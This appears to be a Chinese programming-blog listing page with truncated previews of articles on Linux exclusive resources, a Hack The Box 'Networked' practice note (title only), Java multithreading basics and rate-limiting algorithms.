在linux系统当中存在很多独占性的资源&#xff0c;他在同一个时间只能被一个进程使用。常见的有打印机、内存或者系统内部表现等资源。如果打印机同时被两个进程使用&#xff0c;打印结果就会混乱输出结果&#xff1b;如果一个内存资源被多个进程同时修改&#xff0c;进程实际的…

【Hack The Box】linux练习-- Networked

HTB 学习笔记 【Hack The Box】linux练习-- Networked &#x1f525;系列专栏&#xff1a;Hack The Box &#x1f389;欢迎关注&#x1f50e;点赞&#x1f44d;收藏⭐️留言&#x1f4dd; &#x1f4c6;首发时间&#xff1a;&#x1f334;2022年11月17日&#x1f334; &#x…

Java多线程从基本概念到精通大神,大佬给我们铺平学习之路

Java 提供了多线程编程的内置支持&#xff0c;让我们可以轻松开发多线程应用。 Java 中我们最为熟悉的线程就是 main 线程——主线程。 一个进程可以并发多个线程&#xff0c;每条线程并行执行不同的任务。线程是进程的基本单位&#xff0c;是一个单一顺序的控制流&#xff0c;…

常见的限流算法与实现

限流的实现 常见的限流算法&#xff1a; 限流是对某一时间窗口内的请求数进行限制&#xff0c;保持系统的可用性和稳定性&#xff0c;防止因流量暴增而导致的系统运行缓慢或宕机。 常见的限流算法有三种&#xff1a; 计数器限流(固定窗口) 原理&#xff1a; 时间线划分为多…